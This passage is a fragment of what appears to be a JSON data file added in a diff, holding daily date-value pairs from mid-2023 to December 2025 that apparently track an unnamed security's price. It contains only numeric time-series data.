], + [ + "2023-07-27", + 20.779420852661133 + ], + [ + "2023-07-28", + 21.903154373168945 + ], + [ + "2023-07-31", + 21.946744918823242 + ], + [ + "2023-08-01", + 21.777217864990234 + ], + [ + "2023-08-02", + 20.353174209594727 + ], + [ + "2023-08-03", + 20.207862854003906 + ], + [ + "2023-08-04", + 19.926929473876953 + ], + [ + "2023-08-07", + 20.420982360839844 + ], + [ + "2023-08-08", + 19.89786720275879 + ], + [ + "2023-08-09", + 19.234285354614258 + ], + [ + "2023-08-10", + 19.321470260620117 + ], + [ + "2023-08-11", + 18.93397331237793 + ], + [ + "2023-08-14", + 19.56365203857422 + ], + [ + "2023-08-15", + 18.96303367614746 + ], + [ + "2023-08-16", + 18.333354949951172 + ], + [ + "2023-08-17", + 17.71336555480957 + ], + [ + "2023-08-18", + 17.63102149963379 + ], + [ + "2023-08-21", + 18.483509063720703 + ], + [ + "2023-08-22", + 18.401166915893555 + ], + [ + "2023-08-23", + 19.2681827545166 + ], + [ + "2023-08-24", + 17.9991397857666 + ], + [ + "2023-08-25", + 18.42538833618164 + ], + [ + "2023-08-28", + 18.837099075317383 + ], + [ + "2023-08-29", + 20.038333892822266 + ], + [ + "2023-08-30", + 20.372547149658203 + ], + [ + "2023-08-31", + 20.556608200073242 + ], + [ + "2023-09-01", + 20.48395347595215 + ], + [ + "2023-09-05", + 20.537235260009766 + ], + [ + "2023-09-06", + 19.994741439819336 + ], + [ + "2023-09-07", + 19.558809280395508 + ], + [ + "2023-09-08", + 19.616933822631836 + ], + [ + "2023-09-11", + 20.285364151000977 + ], + [ + "2023-09-12", + 19.636308670043945 + ], + [ + "2023-09-13", + 19.83005714416504 + ], + [ + "2023-09-14", + 20.2950496673584 + ], + [ + "2023-09-15", + 19.2536563873291 + ], + [ + "2023-09-18", + 19.297252655029297 + ], + [ + "2023-09-19", + 19.180999755859375 + ], + [ + "2023-09-20", + 18.349327087402344 + ], + [ + "2023-09-21", + 17.30426597595215 + ], + [ + "2023-09-22", + 17.3188533782959 + ], + [ + "2023-09-25", + 17.547304153442383 + ], + [ + "2023-09-26", + 16.76472282409668 + ], + [ + "2023-09-27", + 16.866798400878906 + ], + [ + "2023-09-28", + 17.275100708007812 + ], + [ + "2023-09-29", + 17.31398582458496 + ], + [ + "2023-10-02", + 17.72715187072754 + ], + [ + "2023-10-03", + 16.789024353027344 + ], + [ + "2023-10-04", + 17.469532012939453 + ], + [ + "2023-10-05", + 17.284826278686523 + ], + [ + "2023-10-06", + 18.154897689819336 + ], + [ + "2023-10-09", + 18.4222412109375 + ], + [ + "2023-10-10", + 18.72360610961914 + ], + [ + "2023-10-11", + 19.12218475341797 + ], + [ + "2023-10-12", + 18.89859390258789 + ], + [ + "2023-10-13", + 18.184062957763672 + ], + [ + "2023-10-16", + 18.79651641845703 + ], + [ + "2023-10-17", + 18.616666793823242 + ], + [ + "2023-10-18", + 17.829227447509766 + ], + [ + "2023-10-19", + 17.35287094116211 + ], + [ + "2023-10-20", + 16.570295333862305 + ], + [ + "2023-10-23", + 16.716114044189453 + ], + [ + "2023-10-24", + 17.187610626220703 + ], + [ + "2023-10-25", + 15.928671836853027 + ], + [ + "2023-10-26", + 15.000271797180176 + ], + [ + "2023-10-27", + 15.214142799377441 + ], + [ + "2023-10-30", + 15.705080032348633 + ], + [ + "2023-10-31", + 15.933536529541016 + ], + [ + "2023-11-01", + 16.7550048828125 + ], + [ + "2023-11-02", + 17.644519805908203 + ], + [ + "2023-11-03", + 18.26669692993164 + ], + [ + "2023-11-06", + 18.475704193115234 + ], + [ + "2023-11-07", + 18.99580955505371 + ], + [ + "2023-11-08", + 19.029836654663086 + ], + [ + "2023-11-09", + 18.577781677246094 + ], + [ + "2023-11-10", + 19.817276000976562 + ], + [ + "2023-11-13", + 19.637426376342773 + ], + [ + "2023-11-14", + 20.872055053710938 + ], + [ + "2023-11-15", + 20.930387496948242 + ], + [ + "2023-11-16", + 20.964412689208984 + ], + [ + "2023-11-17", + 20.97899055480957 + ], + [ + "2023-11-20", + 21.72754669189453 + ], + [ + "2023-11-21", + 21.33382797241211 + ], + [ + "2023-11-22", + 21.581727981567383 + ], + [ + "2023-11-24", + 21.474790573120117 + ], + [ + "2023-11-27", + 21.411598205566406 + ], + [ + "2023-11-28", + 21.581727981567383 + ], + [ + "2023-11-29", + 21.50395393371582 + ], + [ + "2023-11-30", + 21.32410430908203 + ], + [ + "2023-12-01", + 21.50395393371582 + ], + [ + "2023-12-04", + 20.89150047302246 + ], + [ + "2023-12-05", + 21.042184829711914 + ], + [ + "2023-12-06", + 20.667903900146484 + ], + [ + "2023-12-07", + 21.533119201660156 + ], + [ + "2023-12-08", + 21.790740966796875 + ], + [ + "2023-12-11", + 22.344867706298828 + ], + [ + "2023-12-12", + 22.88440704345703 + ], + [ + "2023-12-13", + 23.69129180908203 + ], + [ + "2023-12-14", + 23.65240478515625 + ], + [ + "2023-12-15", + 23.934329986572266 + ], + [ + "2023-12-18", + 24.434986114501953 + ], + [ + "2023-12-19", + 24.79953956604004 + ], + [ + "2023-12-20", + 23.697654724121094 + ], + [ + "2023-12-21", + 24.483671188354492 + ], + [ + "2023-12-22", + 24.581310272216797 + ], + [ + "2023-12-26", + 25.03046417236328 + ], + [ + "2023-12-27", + 25.162281036376953 + ], + [ + "2023-12-28", + 25.09881591796875 + ], + [ + "2023-12-29", + 24.752185821533203 + ], + [ + "2024-01-02", + 23.49748992919922 + ], + [ + "2024-01-03", + 22.74564552307129 + ], + [ + "2024-01-04", + 22.364845275878906 + ], + [ + "2024-01-05", + 22.44783592224121 + ], + [ + "2024-01-08", + 23.8001766204834 + ], + [ + "2024-01-09", + 23.956403732299805 + ], + [ + "2024-01-10", + 24.429969787597656 + ], + [ + "2024-01-11", + 24.547138214111328 + ], + [ + "2024-01-12", + 24.576427459716797 + ], + [ + "2024-01-16", + 24.561784744262695 + ], + [ + "2024-01-17", + 24.137041091918945 + ], + [ + "2024-01-18", + 25.172046661376953 + ], + [ + "2024-01-19", + 26.626907348632812 + ], + [ + "2024-01-22", + 26.734312057495117 + ], + [ + "2024-01-23", + 27.05164909362793 + ], + [ + "2024-01-24", + 27.49591827392578 + ], + [ + "2024-01-25", + 27.574031829833984 + ], + [ + "2024-01-26", + 27.06629180908203 + ], + [ + "2024-01-29", + 27.862075805664062 + ], + [ + "2024-01-30", + 27.305519104003906 + ], + [ + "2024-01-31", + 25.699310302734375 + ], + [ + "2024-02-01", + 26.607379913330078 + ], + [ + "2024-02-02", + 27.945070266723633 + ], + [ + "2024-02-05", + 27.803491592407227 + ], + [ + "2024-02-06", + 27.642377853393555 + ], + [ + "2024-02-07", + 28.467453002929688 + ], + [ + "2024-02-08", + 28.58462142944336 + ], + [ + "2024-02-09", + 29.424341201782227 + ], + [ + "2024-02-12", + 29.077713012695312 + ], + [ + "2024-02-13", + 27.700965881347656 + ], + [ + "2024-02-14", + 28.579742431640625 + ], + [ + "2024-02-15", + 28.81896209716797 + ], + [ + "2024-02-16", + 28.028066635131836 + ], + [ + "2024-02-20", + 27.378751754760742 + ], + [ + "2024-02-21", + 27.037002563476562 + ], + [ + "2024-02-22", + 29.375518798828125 + ], + [ + "2024-02-23", + 29.10700798034668 + ], + [ + "2024-02-26", + 29.067949295043945 + ], + [ + "2024-02-27", + 29.24858856201172 + ], + [ + "2024-02-28", + 28.7750244140625 + ], + [ + "2024-02-29", + 29.468284606933594 + ], + [ + "2024-03-01", + 30.820619583129883 + ], + [ + "2024-03-04", + 30.4544620513916 + ], + [ + "2024-03-05", + 28.823848724365234 + ], + [ + "2024-03-06", + 29.355995178222656 + ], + [ + "2024-03-07", + 30.664392471313477 + ], + [ + "2024-03-08", + 29.32181739807129 + ], + [ + "2024-03-11", + 28.980073928833008 + ], + [ + "2024-03-12", + 30.210359573364258 + ], + [ + "2024-03-13", + 29.50733757019043 + ], + [ + "2024-03-14", + 29.268115997314453 + ], + [ + "2024-03-15", + 28.198936462402344 + ], + [ + "2024-03-18", + 28.99471664428711 + ], + [ + "2024-03-19", + 29.19488525390625 + ], + [ + "2024-03-20", + 30.231168746948242 + ], + [ + "2024-03-21", + 30.623149871826172 + ], + [ + "2024-03-22", + 30.686845779418945 + ], + [ + "2024-03-25", + 30.373262405395508 + ], + [ + "2024-03-26", + 30.089078903198242 + ], + [ + "2024-03-27", + 30.35366439819336 + ], + [ + "2024-03-28", + 30.162574768066406 + ], + [ + "2024-04-01", + 30.34876251220703 + ], + [ + "2024-04-02", + 29.53541374206543 + ], + [ + "2024-04-03", + 29.731403350830078 + ], + [ + "2024-04-04", + 28.330087661743164 + ], + [ + "2024-04-05", + 29.329626083374023 + ], + [ + "2024-04-08", + 29.349224090576172 + ], + [ + "2024-04-09", + 29.653005599975586 + ], + [ + "2024-04-10", + 28.87395477294922 + ], + [ + "2024-04-11", + 30.231168746948242 + ], + [ + "2024-04-12", + 28.77106285095215 + ], + [ + "2024-04-15", + 27.325647354125977 + ], + [ + "2024-04-16", + 27.330547332763672 + ], + [ + "2024-04-17", + 26.316307067871094 + ], + [ + "2024-04-18", + 25.845935821533203 + ], + [ + "2024-04-19", + 24.24373435974121 + ], + [ + "2024-04-22", + 24.949289321899414 + ], + [ + "2024-04-23", + 26.061521530151367 + ], + [ + "2024-04-24", + 26.316307067871094 + ], + [ + "2024-04-25", + 25.894933700561523 + ], + [ + "2024-04-26", + 27.08555793762207 + ], + [ + "2024-04-29", + 27.408939361572266 + ], + [ + "2024-04-30", + 25.84103775024414 + ], + [ + "2024-05-01", + 25.282470703125 + ], + [ + "2024-05-02", + 26.218311309814453 + ], + [ + "2024-05-03", + 27.781320571899414 + ], + [ + "2024-05-06", + 28.692665100097656 + ], + [ + "2024-05-07", + 28.692665100097656 + ], + [ + "2024-05-08", + 28.638769149780273 + ], + [ + "2024-05-09", + 28.795560836791992 + ], + [ + "2024-05-10", + 28.991544723510742 + ], + [ + "2024-05-13", + 29.182634353637695 + ], + [ + "2024-05-14", + 29.726499557495117 + ], + [ + "2024-05-15", + 31.098419189453125 + ], + [ + "2024-05-16", + 30.907331466674805 + ], + [ + "2024-05-17", + 30.838733673095703 + ], + [ + "2024-05-20", + 31.47569465637207 + ], + [ + "2024-05-21", + 31.637386322021484 + ], + [ + "2024-05-22", + 31.61779022216797 + ], + [ + "2024-05-23", + 31.14741325378418 + ], + [ + "2024-05-24", + 32.019561767578125 + ], + [ + "2024-05-28", + 32.3674430847168 + ], + [ + "2024-05-29", + 31.691280364990234 + ], + [ + "2024-05-30", + 30.672142028808594 + ], + [ + "2024-05-31", + 30.637845993041992 + ], + [ + "2024-06-03", + 30.936729431152344 + ], + [ + "2024-06-04", + 31.167016983032227 + ], + [ + "2024-06-05", + 33.04849624633789 + ], + [ + "2024-06-06", + 33.009307861328125 + ], + [ + "2024-06-07", + 32.88681411743164 + ], + [ + "2024-06-10", + 33.23469161987305 + ], + [ + "2024-06-11", + 33.92064666748047 + ], + [ + "2024-06-12", + 35.25826644897461 + ], + [ + "2024-06-13", + 35.82173156738281 + ], + [ + "2024-06-14", + 36.34109878540039 + ], + [ + "2024-06-17", + 37.65911865234375 + ], + [ + "2024-06-18", + 37.6787223815918 + ], + [ + "2024-06-20", + 36.7918701171875 + ], + [ + "2024-06-21", + 36.453800201416016 + ], + [ + "2024-06-24", + 35.21906280517578 + ], + [ + "2024-06-25", + 36.394996643066406 + ], + [ + "2024-06-26", + 36.62271499633789 + ], + [ + "2024-06-27", + 36.88832092285156 + ], + [ + "2024-06-28", + 36.30793762207031 + ], + [ + "2024-07-01", + 36.903076171875 + ], + [ + "2024-07-02", + 38.03432083129883 + ], + [ + "2024-07-03", + 38.968814849853516 + ], + [ + "2024-07-05", + 40.14924621582031 + ], + [ + "2024-07-08", + 40.41484069824219 + ], + [ + "2024-07-09", + 40.50337219238281 + ], + [ + "2024-07-10", + 41.77233123779297 + ], + [ + "2024-07-11", + 39.0278434753418 + ], + [ + "2024-07-12", + 39.66231918334961 + ], + [ + "2024-07-15", + 39.957427978515625 + ], + [ + "2024-07-16", + 39.9869384765625 + ], + [ + "2024-07-17", + 36.47025680541992 + ], + [ + "2024-07-18", + 35.9243049621582 + ], + [ + "2024-07-19", + 34.95044708251953 + ], + [ + "2024-07-22", + 36.47517013549805 + ], + [ + "2024-07-23", + 36.081687927246094 + ], + [ + "2024-07-24", + 32.19120407104492 + ], + [ + "2024-07-25", + 31.118986129760742 + ], + [ + "2024-07-26", + 32.00922775268555 + ], + [ + "2024-07-29", + 32.19612503051758 + ], + [ + "2024-07-30", + 30.882902145385742 + ], + [ + "2024-07-31", + 33.5831298828125 + ], + [ + "2024-08-01", + 31.163251876831055 + ], + [ + "2024-08-02", + 28.89093017578125 + ], + [ + "2024-08-05", + 26.3726863861084 + ], + [ + "2024-08-06", + 27.03175926208496 + ], + [ + "2024-08-07", + 26.161195755004883 + ], + [ + "2024-08-08", + 28.55647850036621 + ], + [ + "2024-08-09", + 28.94503402709961 + ], + [ + "2024-08-12", + 29.141769409179688 + ], + [ + "2024-08-13", + 31.261621475219727 + ], + [ + "2024-08-14", + 31.31572151184082 + ], + [ + "2024-08-15", + 33.671661376953125 + ], + [ + "2024-08-16", + 33.760189056396484 + ], + [ + "2024-08-19", + 35.06849670410156 + ], + [ + "2024-08-20", + 34.852081298828125 + ], + [ + "2024-08-21", + 35.32917022705078 + ], + [ + "2024-08-22", + 33.63230895996094 + ], + [ + "2024-08-23", + 34.68977355957031 + ], + [ + "2024-08-26", + 33.671661376953125 + ], + [ + "2024-08-27", + 33.95692443847656 + ], + [ + "2024-08-28", + 32.80600357055664 + ], + [ + "2024-08-29", + 32.63386535644531 + ], + [ + "2024-08-30", + 33.74543380737305 + ], + [ + "2024-09-03", + 30.666486740112305 + ], + [ + "2024-09-04", + 30.405811309814453 + ], + [ + "2024-09-05", + 30.504179000854492 + ], + [ + "2024-09-06", + 28.030202865600586 + ], + [ + "2024-09-09", + 29.072914123535156 + ], + [ + "2024-09-10", + 29.85494613647461 + ], + [ + "2024-09-11", + 31.758384704589844 + ], + [ + "2024-09-12", + 32.697811126708984 + ], + [ + "2024-09-13", + 33.125709533691406 + ], + [ + "2024-09-16", + 32.683048248291016 + ], + [ + "2024-09-17", + 32.702728271484375 + ], + [ + "2024-09-18", + 32.27482223510742 + ], + [ + "2024-09-19", + 34.7143669128418 + ], + [ + "2024-09-20", + 34.49303436279297 + ], + [ + "2024-09-23", + 34.74879837036133 + ], + [ + "2024-09-24", + 35.240638732910156 + ], + [ + "2024-09-25", + 35.36399841308594 + ], + [ + "2024-09-26", + 36.11400604248047 + ], + [ + "2024-09-27", + 35.49229049682617 + ], + [ + "2024-09-30", + 35.76860809326172 + ], + [ + "2024-10-01", + 34.2537841796875 + ], + [ + "2024-10-02", + 34.382076263427734 + ], + [ + "2024-10-03", + 34.303123474121094 + ], + [ + "2024-10-04", + 35.51203155517578 + ], + [ + "2024-10-07", + 34.34260177612305 + ], + [ + "2024-10-08", + 35.832759857177734 + ], + [ + "2024-10-09", + 36.69625473022461 + ], + [ + "2024-10-10", + 36.567962646484375 + ], + [ + "2024-10-11", + 36.66171646118164 + ], + [ + "2024-10-14", + 37.59922790527344 + ], + [ + "2024-10-15", + 36.09920883178711 + ], + [ + "2024-10-16", + 36.0794677734375 + ], + [ + "2024-10-17", + 36.188018798828125 + ], + [ + "2024-10-18", + 36.82948303222656 + ], + [ + "2024-10-21", + 37.03178787231445 + ], + [ + "2024-10-22", + 37.140342712402344 + ], + [ + "2024-10-23", + 35.423213958740234 + ], + [ + "2024-10-24", + 36.26697540283203 + ], + [ + "2024-10-25", + 36.878822326660156 + ], + [ + "2024-10-28", + 36.91336441040039 + ], + [ + "2024-10-29", + 37.934757232666016 + ], + [ + "2024-10-30", + 37.09099578857422 + ], + [ + "2024-10-31", + 34.26858139038086 + ], + [ + "2024-11-01", + 34.99885559082031 + ], + [ + "2024-11-04", + 34.67319869995117 + ], + [ + "2024-11-05", + 35.99065017700195 + ], + [ + "2024-11-06", + 38.91175079345703 + ], + [ + "2024-11-07", + 40.73249435424805 + ], + [ + "2024-11-08", + 40.831180572509766 + ], + [ + "2024-11-11", + 40.757164001464844 + ], + [ + "2024-11-12", + 40.535125732421875 + ], + [ + "2024-11-13", + 40.35749435424805 + ], + [ + "2024-11-14", + 39.50386047363281 + ], + [ + "2024-11-15", + 36.64691162109375 + ], + [ + "2024-11-18", + 37.38705062866211 + ], + [ + "2024-11-19", + 38.13706588745117 + ], + [ + "2024-11-20", + 38.092655181884766 + ], + [ + "2024-11-21", + 38.46765899658203 + ], + [ + "2024-11-22", + 38.61075210571289 + ], + [ + "2024-11-25", + 38.78839111328125 + ], + [ + "2024-11-26", + 39.390377044677734 + ], + [ + "2024-11-27", + 38.438053131103516 + ], + [ + "2024-11-29", + 39.41997528076172 + ], + [ + "2024-12-02", + 40.697959899902344 + ], + [ + "2024-12-03", + 41.05815505981445 + ], + [ + "2024-12-04", + 42.55818176269531 + ], + [ + "2024-12-05", + 42.20785140991211 + ], + [ + "2024-12-06", + 43.29338836669922 + ], + [ + "2024-12-09", + 42.2818603515625 + ], + [ + "2024-12-10", + 41.82297134399414 + ], + [ + "2024-12-11", + 44.05820083618164 + ], + [ + "2024-12-12", + 43.18483352661133 + ], + [ + "2024-12-13", + 44.11248016357422 + ], + [ + "2024-12-16", + 46.03191375732422 + ], + [ + "2024-12-17", + 45.415130615234375 + ], + [ + "2024-12-18", + 40.505516052246094 + ], + [ + "2024-12-19", + 39.93314743041992 + ], + [ + "2024-12-20", + 40.969337463378906 + ], + [ + "2024-12-23", + 42.110469818115234 + ], + [ + "2024-12-24", + 43.7838020324707 + ], + [ + "2024-12-26", + 43.689735412597656 + ], + [ + "2024-12-27", + 41.912452697753906 + ], + [ + "2024-12-30", + 40.229217529296875 + ], + [ + "2024-12-31", + 39.17471694946289 + ], + [ + "2025-01-02", + 38.92718505859375 + ], + [ + "2025-01-03", + 40.79359436035156 + ], + [ + "2025-01-06", + 42.18473815917969 + ], + [ + "2025-01-07", + 39.912376403808594 + ], + [ + "2025-01-08", + 39.942081451416016 + ], + [ + "2025-01-10", + 38.03606414794922 + ], + [ + "2025-01-13", + 37.640010833740234 + ], + [ + "2025-01-14", + 37.506343841552734 + ], + [ + "2025-01-15", + 40.04108810424805 + ], + [ + "2025-01-16", + 39.22422409057617 + ], + [ + "2025-01-17", + 41.159942626953125 + ], + [ + "2025-01-21", + 41.843135833740234 + ], + [ + "2025-01-22", + 43.466957092285156 + ], + [ + "2025-01-23", + 43.73429870605469 + ], + [ + "2025-01-24", + 42.9471435546875 + ], + [ + "2025-01-27", + 39.1796760559082 + ], + [ + "2025-01-28", + 40.917362213134766 + ], + [ + "2025-01-29", + 40.66487503051758 + ], + [ + "2025-01-30", + 41.1747932434082 + ], + [ + "2025-01-31", + 40.95201110839844 + ], + [ + "2025-02-03", + 39.96187973022461 + ], + [ + "2025-02-04", + 41.41242599487305 + ], + [ + "2025-02-05", + 41.952049255371094 + ], + [ + "2025-02-06", + 42.580787658691406 + ], + [ + "2025-02-07", + 40.95696258544922 + ], + [ + "2025-02-10", + 42.39760971069336 + ], + [ + "2025-02-11", + 42.09562301635742 + ], + [ + "2025-02-12", + 42.17978286743164 + ], + [ + "2025-02-13", + 43.95707702636719 + ], + [ + "2025-02-14", + 44.471946716308594 + ], + [ + "2025-02-18", + 44.749183654785156 + ], + [ + "2025-02-19", + 44.7541389465332 + ], + [ + "2025-02-20", + 44.20956039428711 + ], + [ + "2025-02-21", + 41.44213104248047 + ], + [ + "2025-02-24", + 39.95197677612305 + ], + [ + "2025-02-25", + 38.42716979980469 + ], + [ + "2025-02-26", + 38.67470932006836 + ], + [ + "2025-02-27", + 35.4666633605957 + ], + [ + "2025-02-28", + 37.09048080444336 + ], + [ + "2025-03-03", + 34.694358825683594 + ], + [ + "2025-03-04", + 34.31315231323242 + ], + [ + "2025-03-05", + 35.649837493896484 + ], + [ + "2025-03-06", + 32.69428253173828 + ], + [ + "2025-03-07", + 33.37253189086914 + ], + [ + "2025-03-10", + 29.61001205444336 + ], + [ + "2025-03-11", + 29.26346206665039 + ], + [ + "2025-03-12", + 30.26350212097168 + ], + [ + "2025-03-13", + 28.609973907470703 + ], + [ + "2025-03-14", + 30.63974952697754 + ], + [ + "2025-03-17", + 31.23383331298828 + ], + [ + "2025-03-18", + 29.659517288208008 + ], + [ + "2025-03-19", + 30.813026428222656 + ], + [ + "2025-03-20", + 30.496177673339844 + ], + [ + "2025-03-21", + 30.7833194732666 + ], + [ + "2025-03-24", + 32.73883819580078 + ], + [ + "2025-03-25", + 33.32301330566406 + ], + [ + "2025-03-26", + 31.469974517822266 + ], + [ + "2025-03-27", + 30.93372344970703 + ], + [ + "2025-03-28", + 28.4709415435791 + ], + [ + "2025-03-31", + 28.451080322265625 + ], + [ + "2025-04-01", + 29.10649871826172 + ], + [ + "2025-04-02", + 29.7569522857666 + ], + [ + "2025-04-03", + 24.97538185119629 + ], + [ + "2025-04-04", + 20.402353286743164 + ], + [ + "2025-04-07", + 20.481800079345703 + ], + [ + "2025-04-08", + 19.314958572387695 + ], + [ + "2025-04-09", + 26.122364044189453 + ], + [ + "2025-04-10", + 22.90982437133789 + ], + [ + "2025-04-11", + 24.12135124206543 + ], + [ + "2025-04-14", + 24.627811431884766 + ], + [ + "2025-04-15", + 24.722152709960938 + ], + [ + "2025-04-16", + 22.487775802612305 + ], + [ + "2025-04-17", + 22.423227310180664 + ], + [ + "2025-04-21", + 20.784683227539062 + ], + [ + "2025-04-22", + 22.373573303222656 + ], + [ + "2025-04-23", + 23.858192443847656 + ], + [ + "2025-04-24", + 25.888996124267578 + ], + [ + "2025-04-25", + 26.743022918701172 + ], + [ + "2025-04-28", + 26.723159790039062 + ], + [ + "2025-04-29", + 27.244518280029297 + ], + [ + "2025-04-30", + 27.249483108520508 + ], + [ + "2025-05-01", + 28.18791961669922 + ], + [ + "2025-05-02", + 29.508686065673828 + ], + [ + "2025-05-05", + 28.997264862060547 + ], + [ + "2025-05-06", + 28.17302703857422 + ], + [ + "2025-05-07", + 28.500736236572266 + ], + [ + "2025-05-08", + 29.34979820251465 + ], + [ + "2025-05-09", + 29.280282974243164 + ], + [ + "2025-05-12", + 32.825496673583984 + ], + [ + "2025-05-13", + 34.329978942871094 + ], + [ + "2025-05-14", + 34.93574523925781 + ], + [ + "2025-05-15", + 35.04498291015625 + ], + [ + "2025-05-16", + 35.476959228515625 + ], + [ + "2025-05-19", + 35.5713005065918 + ], + [ + "2025-05-20", + 35.19890594482422 + ], + [ + "2025-05-21", + 33.7341423034668 + ], + [ + "2025-05-22", + 33.90793228149414 + ], + [ + "2025-05-23", + 32.929771423339844 + ], + [ + "2025-05-27", + 35.22372817993164 + ], + [ + "2025-05-28", + 34.771888732910156 + ], + [ + "2025-05-29", + 34.94070816040039 + ], + [ + "2025-05-30", + 34.75699234008789 + ], + [ + "2025-06-02", + 35.55640411376953 + ], + [ + "2025-06-03", + 36.3856086730957 + ], + [ + "2025-06-04", + 36.678558349609375 + ], + [ + "2025-06-05", + 35.824527740478516 + ], + [ + "2025-06-06", + 36.84737777709961 + ], + [ + "2025-06-09", + 37.01123046875 + ], + [ + "2025-06-10", + 37.726234436035156 + ], + [ + "2025-06-11", + 37.33893966674805 + ], + [ + "2025-06-12", + 37.58224105834961 + ], + [ + "2025-06-13", + 36.16217041015625 + ], + [ + "2025-06-16", + 37.63685989379883 + ], + [ + "2025-06-17", + 36.52463150024414 + ], + [ + "2025-06-18", + 36.474979400634766 + ], + [ + "2025-06-20", + 35.97348403930664 + ], + [ + "2025-06-23", + 37.090675354003906 + ], + [ + "2025-06-24", + 38.778873443603516 + ], + [ + "2025-06-25", + 39.076629638671875 + ], + [ + "2025-06-26", + 40.147151947021484 + ], + [ + "2025-06-27", + 40.54050827026367 + ], + [ + "2025-06-30", + 41.32721710205078 + ], + [ + "2025-07-01", + 40.276611328125 + ], + [ + "2025-07-02", + 41.0782585144043 + ], + [ + "2025-07-03", + 42.228450775146484 + ], + [ + "2025-07-07", + 41.287384033203125 + ], + [ + "2025-07-08", + 41.34215545654297 + ], + [ + "2025-07-09", + 42.19857406616211 + ], + [ + "2025-07-10", + 42.004390716552734 + ], + [ + "2025-07-11", + 41.68572235107422 + ], + [ + "2025-07-14", + 42.128868103027344 + ], + [ + "2025-07-15", + 42.23841094970703 + ], + [ + "2025-07-16", + 42.35791015625 + ], + [ + "2025-07-17", + 43.34379196166992 + ], + [ + "2025-07-18", + 43.19441604614258 + ], + [ + "2025-07-21", + 43.85166549682617 + ], + [ + "2025-07-22", + 43.16951370239258 + ], + [ + "2025-07-23", + 43.737144470214844 + ], + [ + "2025-07-24", + 44.02593231201172 + ], + [ + "2025-07-25", + 44.27489471435547 + ], + [ + "2025-07-28", + 44.70808410644531 + ], + [ + "2025-07-29", + 44.50393295288086 + ], + [ + "2025-07-30", + 44.658294677734375 + ], + [ + "2025-07-31", + 43.92137145996094 + ], + [ + "2025-08-01", + 41.287384033203125 + ], + [ + "2025-08-04", + 43.547935485839844 + ], + [ + "2025-08-05", + 42.6417236328125 + ], + [ + "2025-08-06", + 44.23505783081055 + ], + [ + "2025-08-07", + 44.68318557739258 + ], + [ + "2025-08-08", + 45.88814926147461 + ], + [ + "2025-08-11", + 45.48483657836914 + ], + [ + "2025-08-12", + 47.16282272338867 + ], + [ + "2025-08-13", + 47.2325325012207 + ], + [ + "2025-08-14", + 47.10306930541992 + ], + [ + "2025-08-15", + 46.43585968017578 + ], + [ + "2025-08-18", + 46.3761100769043 + ], + [ + "2025-08-19", + 44.48401641845703 + ], + [ + "2025-08-20", + 43.67241668701172 + ], + [ + "2025-08-21", + 43.0649528503418 + ], + [ + "2025-08-22", + 45.001853942871094 + ], + [ + "2025-08-25", + 44.608497619628906 + ], + [ + "2025-08-26", + 45.1263313293457 + ], + [ + "2025-08-27", + 45.33047866821289 + ], + [ + "2025-08-28", + 46.15702438354492 + ], + [ + "2025-08-29", + 44.493980407714844 + ], + [ + "2025-09-02", + 43.358726501464844 + ], + [ + "2025-09-03", + 44.36949920654297 + ], + [ + "2025-09-04", + 45.569480895996094 + ], + [ + "2025-09-05", + 45.7188606262207 + ], + [ + "2025-09-08", + 46.37112808227539 + ], + [ + "2025-09-09", + 46.749549865722656 + ], + [ + "2025-09-10", + 46.799339294433594 + ], + [ + "2025-09-11", + 47.58605194091797 + ], + [ + "2025-09-12", + 48.1785774230957 + ], + [ + "2025-09-15", + 49.40843200683594 + ], + [ + "2025-09-16", + 49.27399444580078 + ], + [ + "2025-09-17", + 48.96030807495117 + ], + [ + "2025-09-18", + 50.27979278564453 + ], + [ + "2025-09-19", + 51.27562713623047 + ], + [ + "2025-09-22", + 52.142005920410156 + ], + [ + "2025-09-23", + 51.09139633178711 + ], + [ + "2025-09-24", + 50.54216766357422 + ], + [ + "2025-09-25", + 49.864349365234375 + ], + [ + "2025-09-26", + 50.46242141723633 + ], + [ + "2025-09-29", + 51.13525390625 + ], + [ + "2025-09-30", + 51.53396987915039 + ], + [ + "2025-10-01", + 52.26162338256836 + ], + [ + "2025-10-02", + 52.899566650390625 + ], + [ + "2025-10-03", + 52.181880950927734 + ], + [ + "2025-10-06", + 53.34812545776367 + ], + [ + "2025-10-07", + 52.48590087890625 + ], + [ + "2025-10-08", + 54.26517105102539 + ], + [ + "2025-10-09", + 54.05086135864258 + ], + [ + "2025-10-10", + 48.37913513183594 + ], + [ + "2025-10-13", + 51.44924545288086 + ], + [ + "2025-10-14", + 50.402610778808594 + ], + [ + "2025-10-15", + 51.43429183959961 + ], + [ + "2025-10-16", + 50.86113739013672 + ], + [ + "2025-10-17", + 51.82802200317383 + ], + [ + "2025-10-20", + 53.771759033203125 + ], + [ + "2025-10-21", + 53.711952209472656 + ], + [ + "2025-10-22", + 52.132041931152344 + ], + [ + "2025-10-23", + 53.437835693359375 + ], + [ + "2025-10-24", + 55.10247039794922 + ], + [ + "2025-10-27", + 58.028045654296875 + ], + [ + "2025-10-28", + 59.35377502441406 + ], + [ + "2025-10-29", + 60.11133575439453 + ], + [ + "2025-10-30", + 57.36019515991211 + ], + [ + "2025-10-31", + 58.17258071899414 + ], + [ + "2025-11-03", + 58.97001266479492 + ], + [ + "2025-11-04", + 55.36164093017578 + ], + [ + "2025-11-05", + 56.438167572021484 + ], + [ + "2025-11-06", + 53.27336502075195 + ], + [ + "2025-11-07", + 52.72014617919922 + ], + [ + "2025-11-10", + 56.17401885986328 + ], + [ + "2025-11-11", + 55.710514068603516 + ], + [ + "2025-11-12", + 55.59588623046875 + ], + [ + "2025-11-13", + 52.161949157714844 + ], + [ + "2025-11-14", + 52.20181655883789 + ], + [ + "2025-11-17", + 50.86113739013672 + ], + [ + "2025-11-18", + 49.022064208984375 + ], + [ + "2025-11-19", + 49.864349365234375 + ], + [ + "2025-11-20", + 46.30083084106445 + ], + [ + "2025-11-21", + 47.327518463134766 + ], + [ + "2025-11-24", + 50.91596603393555 + ], + [ + "2025-11-25", + 51.84297180175781 + ], + [ + "2025-11-26", + 53.1986083984375 + ], + [ + "2025-11-28", + 54.36484909057617 + ], + [ + "2025-12-01", + 53.87641906738281 + ], + [ + "2025-12-02", + 55.12240982055664 + ], + [ + "2025-12-03", + 55.51115417480469 + ], + [ + "2025-12-04", + 55.33173370361328 + ], + [ + "2025-12-05", + 55.96968078613281 + ], + [ + "2025-12-08", + 55.62080001831055 + ], + [ + "2025-12-09", + 55.83012390136719 + ], + [ + "2025-12-10", + 56.468074798583984 + ], + [ + "2025-12-11", + 55.9298095703125 + ], + [ + "2025-12-12", + 52.65037536621094 + ], + [ + "2025-12-15", + 51.852943420410156 + ], + [ + 